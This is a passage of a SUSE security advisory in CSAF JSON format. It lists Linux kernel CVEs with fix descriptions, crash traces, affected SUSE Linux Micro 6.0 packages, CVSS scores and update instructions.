"vectorString": "CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2025-40345"
},
{
"cve": "CVE-2025-40346",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40346"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\narch_topology: Fix incorrect error check in topology_parse_cpu_capacity()\n\nFix incorrect use of PTR_ERR_OR_ZERO() in topology_parse_cpu_capacity()\nwhich causes the code to proceed with NULL clock pointers. The current\nlogic uses !PTR_ERR_OR_ZERO(cpu_clk) which evaluates to true for both\nvalid pointers and NULL, leading to potential NULL pointer dereference\nin clk_get_rate().\n\nPer include/linux/err.h documentation, PTR_ERR_OR_ZERO(ptr) returns:\n\"The error code within @ptr if it is an error pointer; 0 otherwise.\"\n\nThis means PTR_ERR_OR_ZERO() returns 0 for both valid pointers AND NULL\npointers. Therefore !PTR_ERR_OR_ZERO(cpu_clk) evaluates to true (proceed)\nwhen cpu_clk is either valid or NULL, causing clk_get_rate(NULL) to be\ncalled when of_clk_get() returns NULL.\n\nReplace with !IS_ERR_OR_NULL(cpu_clk) which only proceeds for valid\npointers, preventing potential NULL pointer dereference in clk_get_rate().",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40346",
"url": "https://www.suse.com/security/cve/CVE-2025-40346"
},
{
"category": "external",
"summary": "SUSE Bug 1255318 for CVE-2025-40346",
"url": "https://bugzilla.suse.com/1255318"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2025-40346"
},
{
"cve": "CVE-2025-40347",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40347"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: enetc: fix the deadlock of enetc_mdio_lock\n\nAfter applying the workaround for err050089, the LS1028A platform\nexperiences RCU stalls on RT kernel. This issue is caused by the\nrecursive acquisition of the read lock enetc_mdio_lock. Here list some\nof the call stacks identified under the enetc_poll path that may lead to\na deadlock:\n\nenetc_poll\n -\u003e enetc_lock_mdio\n -\u003e enetc_clean_rx_ring OR napi_complete_done\n -\u003e napi_gro_receive\n -\u003e enetc_start_xmit\n -\u003e enetc_lock_mdio\n -\u003e enetc_map_tx_buffs\n -\u003e enetc_unlock_mdio\n -\u003e enetc_unlock_mdio\n\nAfter enetc_poll acquires the read lock, a higher-priority writer attempts\nto acquire the lock, causing preemption. The writer detects that a\nread lock is already held and is scheduled out. However, readers under\nenetc_poll cannot acquire the read lock again because a writer is already\nwaiting, leading to a thread hang.\n\nCurrently, the deadlock is avoided by adjusting enetc_lock_mdio to prevent\nrecursive lock acquisition.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40347",
"url": "https://www.suse.com/security/cve/CVE-2025-40347"
},
{
"category": "external",
"summary": "SUSE Bug 1255262 for CVE-2025-40347",
"url": "https://bugzilla.suse.com/1255262"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2025-40347"
},
{
"cve": "CVE-2025-40349",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40349"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nhfs: validate record offset in hfsplus_bmap_alloc\n\nhfsplus_bmap_alloc can trigger a crash if a\nrecord offset or length is larger than node_size\n\n[ 15.264282] BUG: KASAN: slab-out-of-bounds in hfsplus_bmap_alloc+0x887/0x8b0\n[ 15.265192] Read of size 8 at addr ffff8881085ca188 by task test/183\n[ 15.265949]\n[ 15.266163] CPU: 0 UID: 0 PID: 183 Comm: test Not tainted 6.17.0-rc2-gc17b750b3ad9 #14 PREEMPT(voluntary)\n[ 15.266165] Hardware name: QEMU Ubuntu 24.04 PC (i440FX + PIIX, 1996), BIOS 1.16.3-debian-1.16.3-2 04/01/2014\n[ 15.266167] Call Trace:\n[ 15.266168] \u003cTASK\u003e\n[ 15.266169] dump_stack_lvl+0x53/0x70\n[ 15.266173] print_report+0xd0/0x660\n[ 15.266181] kasan_report+0xce/0x100\n[ 15.266185] hfsplus_bmap_alloc+0x887/0x8b0\n[ 15.266208] hfs_btree_inc_height.isra.0+0xd5/0x7c0\n[ 15.266217] hfsplus_brec_insert+0x870/0xb00\n[ 15.266222] __hfsplus_ext_write_extent+0x428/0x570\n[ 15.266225] __hfsplus_ext_cache_extent+0x5e/0x910\n[ 15.266227] hfsplus_ext_read_extent+0x1b2/0x200\n[ 15.266233] hfsplus_file_extend+0x5a7/0x1000\n[ 15.266237] hfsplus_get_block+0x12b/0x8c0\n[ 15.266238] __block_write_begin_int+0x36b/0x12c0\n[ 15.266251] block_write_begin+0x77/0x110\n[ 15.266252] cont_write_begin+0x428/0x720\n[ 15.266259] hfsplus_write_begin+0x51/0x100\n[ 15.266262] cont_write_begin+0x272/0x720\n[ 15.266270] hfsplus_write_begin+0x51/0x100\n[ 15.266274] generic_perform_write+0x321/0x750\n[ 15.266285] generic_file_write_iter+0xc3/0x310\n[ 15.266289] __kernel_write_iter+0x2fd/0x800\n[ 15.266296] dump_user_range+0x2ea/0x910\n[ 15.266301] elf_core_dump+0x2a94/0x2ed0\n[ 15.266320] vfs_coredump+0x1d85/0x45e0\n[ 15.266349] get_signal+0x12e3/0x1990\n[ 15.266357] arch_do_signal_or_restart+0x89/0x580\n[ 15.266362] irqentry_exit_to_user_mode+0xab/0x110\n[ 15.266364] asm_exc_page_fault+0x26/0x30\n[ 15.266366] RIP: 0033:0x41bd35\n[ 15.266367] Code: bc d1 f3 0f 7f 27 f3 0f 7f 6f 10 f3 0f 7f 77 20 f3 0f 7f 7f 30 49 83 c0 0f 49 29 d0 48 8d 7c 17 31 e9 9f 0b 00 00 66 0f ef c0 \u003cf3\u003e 0f 6f 0e f3 0f 6f 56 10 66 0f 74 c1 66 0f d7 d0 49 83 f8f\n[ 15.266369] RSP: 002b:00007ffc9e62d078 EFLAGS: 00010283\n[ 15.266371] RAX: 00007ffc9e62d100 RBX: 0000000000000000 RCX: 0000000000000000\n[ 15.266372] RDX: 00000000000000e0 RSI: 0000000000000000 RDI: 00007ffc9e62d100\n[ 15.266373] RBP: 0000400000000040 R08: 00000000000000e0 R09: 0000000000000000\n[ 15.266374] R10: 0000000000000000 R11: 0000000000000246 R12: 0000000000000000\n[ 15.266375] R13: 0000000000000000 R14: 0000000000000000 R15: 0000400000000000\n[ 15.266376] \u003c/TASK\u003e\n\nWhen calling hfsplus_bmap_alloc to allocate a free node, this function\nfirst retrieves the bitmap from header node and map node using node-\u003epage\ntogether with the offset and length from hfs_brec_lenoff\n\n```\nlen = hfs_brec_lenoff(node, 2, \u0026off16);\noff = off16;\n\noff += node-\u003epage_offset;\npagep = node-\u003epage + (off \u003e\u003e PAGE_SHIFT);\ndata = kmap_local_page(*pagep);\n```\n\nHowever, if the retrieved offset or length is invalid(i.e. exceeds\nnode_size), the code may end up accessing pages outside the allocated\nrange for this node.\n\nThis patch adds proper validation of both offset and length before use,\npreventing out-of-bounds page access. Move is_bnode_offset_valid and\ncheck_and_correct_requested_length to hfsplus_fs.h, as they may be\nrequired by other functions.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40349",
"url": "https://www.suse.com/security/cve/CVE-2025-40349"
},
{
"category": "external",
"summary": "SUSE Bug 1255280 for CVE-2025-40349",
"url": "https://bugzilla.suse.com/1255280"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2025-40349"
},
{
"cve": "CVE-2025-40350",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40350"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet/mlx5e: RX, Fix generating skb from non-linear xdp_buff for striding RQ\n\nXDP programs can change the layout of an xdp_buff through\nbpf_xdp_adjust_tail() and bpf_xdp_adjust_head(). Therefore, the driver\ncannot assume the size of the linear data area nor fragments. Fix the\nbug in mlx5 by generating skb according to xdp_buff after XDP programs\nrun.\n\nCurrently, when handling multi-buf XDP, the mlx5 driver assumes the\nlayout of an xdp_buff to be unchanged. That is, the linear data area\ncontinues to be empty and fragments remain the same. This may cause\nthe driver to generate erroneous skb or triggering a kernel\nwarning. When an XDP program added linear data through\nbpf_xdp_adjust_head(), the linear data will be ignored as\nmlx5e_build_linear_skb() builds an skb without linear data and then\npull data from fragments to fill the linear data area. When an XDP\nprogram has shrunk the non-linear data through bpf_xdp_adjust_tail(),\nthe delta passed to __pskb_pull_tail() may exceed the actual nonlinear\ndata size and trigger the BUG_ON in it.\n\nTo fix the issue, first record the original number of fragments. If the\nnumber of fragments changes after the XDP program runs, rewind the end\nfragment pointer by the difference and recalculate the truesize. Then,\nbuild the skb with the linear data area matching the xdp_buff. Finally,\nonly pull data in if there is non-linear data and fill the linear part\nup to 256 bytes.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40350",
"url": "https://www.suse.com/security/cve/CVE-2025-40350"
},
{
"category": "external",
"summary": "SUSE Bug 1255260 for CVE-2025-40350",
"url": "https://bugzilla.suse.com/1255260"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2025-40350"
},
{
"cve": "CVE-2025-40351",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40351"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nhfsplus: fix KMSAN uninit-value issue in hfsplus_delete_cat()\n\nThe syzbot reported issue in hfsplus_delete_cat():\n\n[ 70.682285][ T9333] =====================================================\n[ 70.682943][ T9333] BUG: KMSAN: uninit-value in hfsplus_subfolders_dec+0x1d7/0x220\n[ 70.683640][ T9333] hfsplus_subfolders_dec+0x1d7/0x220\n[ 70.684141][ T9333] hfsplus_delete_cat+0x105d/0x12b0\n[ 70.684621][ T9333] hfsplus_rmdir+0x13d/0x310\n[ 70.685048][ T9333] vfs_rmdir+0x5ba/0x810\n[ 70.685447][ T9333] do_rmdir+0x964/0xea0\n[ 70.685833][ T9333] __x64_sys_rmdir+0x71/0xb0\n[ 70.686260][ T9333] x64_sys_call+0xcd8/0x3cf0\n[ 70.686695][ T9333] do_syscall_64+0xd9/0x1d0\n[ 70.687119][ T9333] entry_SYSCALL_64_after_hwframe+0x77/0x7f\n[ 70.687646][ T9333]\n[ 70.687856][ T9333] Uninit was stored to memory at:\n[ 70.688311][ T9333] hfsplus_subfolders_inc+0x1c2/0x1d0\n[ 70.688779][ T9333] hfsplus_create_cat+0x148e/0x1800\n[ 70.689231][ T9333] hfsplus_mknod+0x27f/0x600\n[ 70.689730][ T9333] hfsplus_mkdir+0x5a/0x70\n[ 70.690146][ T9333] vfs_mkdir+0x483/0x7a0\n[ 70.690545][ T9333] do_mkdirat+0x3f2/0xd30\n[ 70.690944][ T9333] __x64_sys_mkdir+0x9a/0xf0\n[ 70.691380][ T9333] x64_sys_call+0x2f89/0x3cf0\n[ 70.691816][ T9333] do_syscall_64+0xd9/0x1d0\n[ 70.692229][ T9333] entry_SYSCALL_64_after_hwframe+0x77/0x7f\n[ 70.692773][ T9333]\n[ 70.692990][ T9333] Uninit was stored to memory at:\n[ 70.693469][ T9333] hfsplus_subfolders_inc+0x1c2/0x1d0\n[ 70.693960][ T9333] hfsplus_create_cat+0x148e/0x1800\n[ 70.694438][ T9333] hfsplus_fill_super+0x21c1/0x2700\n[ 70.694911][ T9333] mount_bdev+0x37b/0x530\n[ 70.695320][ T9333] hfsplus_mount+0x4d/0x60\n[ 70.695729][ T9333] legacy_get_tree+0x113/0x2c0\n[ 70.696167][ T9333] vfs_get_tree+0xb3/0x5c0\n[ 70.696588][ T9333] do_new_mount+0x73e/0x1630\n[ 70.697013][ T9333] path_mount+0x6e3/0x1eb0\n[ 70.697425][ T9333] __se_sys_mount+0x733/0x830\n[ 70.697857][ T9333] __x64_sys_mount+0xe4/0x150\n[ 70.698269][ T9333] x64_sys_call+0x2691/0x3cf0\n[ 70.698704][ T9333] do_syscall_64+0xd9/0x1d0\n[ 70.699117][ T9333] entry_SYSCALL_64_after_hwframe+0x77/0x7f\n[ 70.699730][ T9333]\n[ 70.699946][ T9333] Uninit was created at:\n[ 70.700378][ T9333] __alloc_pages_noprof+0x714/0xe60\n[ 70.700843][ T9333] alloc_pages_mpol_noprof+0x2a2/0x9b0\n[ 70.701331][ T9333] alloc_pages_noprof+0xf8/0x1f0\n[ 70.701774][ T9333] allocate_slab+0x30e/0x1390\n[ 70.702194][ T9333] ___slab_alloc+0x1049/0x33a0\n[ 70.702635][ T9333] kmem_cache_alloc_lru_noprof+0x5ce/0xb20\n[ 70.703153][ T9333] hfsplus_alloc_inode+0x5a/0xd0\n[ 70.703598][ T9333] alloc_inode+0x82/0x490\n[ 70.703984][ T9333] iget_locked+0x22e/0x1320\n[ 70.704428][ T9333] hfsplus_iget+0x5c/0xba0\n[ 70.704827][ T9333] hfsplus_btree_open+0x135/0x1dd0\n[ 70.705291][ T9333] hfsplus_fill_super+0x1132/0x2700\n[ 70.705776][ T9333] mount_bdev+0x37b/0x530\n[ 70.706171][ T9333] hfsplus_mount+0x4d/0x60\n[ 70.706579][ T9333] legacy_get_tree+0x113/0x2c0\n[ 70.707019][ T9333] vfs_get_tree+0xb3/0x5c0\n[ 70.707444][ T9333] do_new_mount+0x73e/0x1630\n[ 70.707865][ T9333] path_mount+0x6e3/0x1eb0\n[ 70.708270][ T9333] __se_sys_mount+0x733/0x830\n[ 70.708711][ T9333] __x64_sys_mount+0xe4/0x150\n[ 70.709158][ T9333] x64_sys_call+0x2691/0x3cf0\n[ 70.709630][ T9333] do_syscall_64+0xd9/0x1d0\n[ 70.710053][ T9333] entry_SYSCALL_64_after_hwframe+0x77/0x7f\n[ 70.710611][ T9333]\n[ 70.710842][ T9333] CPU: 3 UID: 0 PID: 9333 Comm: repro Not tainted 6.12.0-rc6-dirty #17\n[ 70.711568][ T9333] Hardware name: QEMU Ubuntu 24.04 PC (i440FX + PIIX, 1996), BIOS 1.16.3-debian-1.16.3-2 04/01/2014\n[ 70.712490][ T9333] =====================================================\n[ 70.713085][ T9333] Disabling lock debugging due to kernel taint\n[ 70.713618][ T9333] Kernel panic - not syncing: kmsan.panic set ...\n[ 70.714159][ T9333] \n---truncated---",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40351",
"url": "https://www.suse.com/security/cve/CVE-2025-40351"
},
{
"category": "external",
"summary": "SUSE Bug 1255281 for CVE-2025-40351",
"url": "https://bugzilla.suse.com/1255281"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
